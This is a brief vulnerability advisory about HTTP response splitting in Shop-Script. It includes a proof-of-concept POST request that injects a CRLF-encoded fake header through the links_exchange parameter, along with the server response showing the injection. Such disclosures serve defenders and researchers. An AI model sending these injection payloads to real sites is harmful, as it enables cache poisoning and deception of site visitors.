38 lines
No EOL
1.2 KiB
Text
38 lines
No EOL
1.2 KiB
Text
source: https://www.securityfocus.com/bid/20685/info
|
|
|
|
Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
|
|
|
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.
|
|
|
|
[Request Header]
|
|
|
|
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
|
|
HTTP/1.0
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
|
|
CLR 1.1.4322)
|
|
Host: www.example.comhttp://www.shop-script-demo.com/
|
|
Content-Length: 18
|
|
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
|
|
Connection: Close
|
|
Pragma: no-cache
|
|
|
|
current_currency=1
|
|
|
|
|
|
[Response Header]
|
|
|
|
HTTP/1.1 302 Found
|
|
Date: Mon, 16 Oct 2006 17:39:57 GMT
|
|
Server: Apache
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
|
|
pre-check=0
|
|
Pragma: no-cache
|
|
Location: index.php?links_exchange=
|
|
FakeHeader:Fake_Custom_Header <= [Custome response
|
|
injected by the attacker]
|
|
Content-Length: 0
|
|
Connection: close
|
|
Content-Type: text/html |